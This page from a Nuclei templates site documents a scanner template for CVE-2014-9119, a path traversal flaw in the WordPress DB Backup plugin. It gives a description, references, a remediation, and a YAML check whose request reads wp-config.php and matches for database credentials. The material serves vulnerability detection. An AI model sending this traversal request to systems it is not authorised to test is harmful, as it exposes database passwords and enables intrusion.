Skip to content
Nuclei Templates

WordPress DB Backup <=4.5 - Local File Inclusion

ID: CVE-2014-9119

Severity: medium

Author: dhiyaneshDK

Tags: cve2014,cve,lfi,wordpress,wp-plugin,wp,backup,wpscan,edb,db_backup_project

Description

Section titled “Description”

WordPress Plugin DB Backup 4.5 and possibly prior versions are prone to a local file inclusion vulnerability because they fail to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.

YAML Source

Section titled “YAML Source”
id: CVE-2014-9119


info:
  name: WordPress DB Backup <=4.5 - Local File Inclusion
  author: dhiyaneshDK
  severity: medium
  description: |
    WordPress Plugin DB Backup 4.5 and possibly prior versions are prone to a local file inclusion vulnerability because they fail to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.
  impact: |
    Allows an attacker to read arbitrary files on the server.
  remediation: |
    Update WordPress DB Backup plugin to version 4.6 or higher.
  reference:
    - https://wpscan.com/vulnerability/d3f1e51e-5f44-4a15-97bc-5eefc3e77536
    - https://www.exploit-db.com/exploits/35378
    - https://nvd.nist.gov/vuln/detail/CVE-2014-9119
    - https://wpvulndb.com/vulnerabilities/7726
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/99368
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2014-9119
    cwe-id: CWE-22
    epss-score: 0.11639
    epss-percentile: 0.95149
    cpe: cpe:2.3:a:db_backup_project:db_backup:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: db_backup_project
    product: db_backup
    framework: wordpress
  tags: cve2014,cve,lfi,wordpress,wp-plugin,wp,backup,wpscan,edb,db_backup_project


http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php'


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        condition: and


      - type: status
        status:
          - 200
# digest: 490a004630440220646ec1d4614540d27cd688852eb6d3a4669a3988ec9a56fb268866e97c6cee73022034d4262872d2ed668c5764fbaeb2dadcc0eee74e19384f061646bc4814a0eb48:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2014/CVE-2014-9119.yaml"

View on Github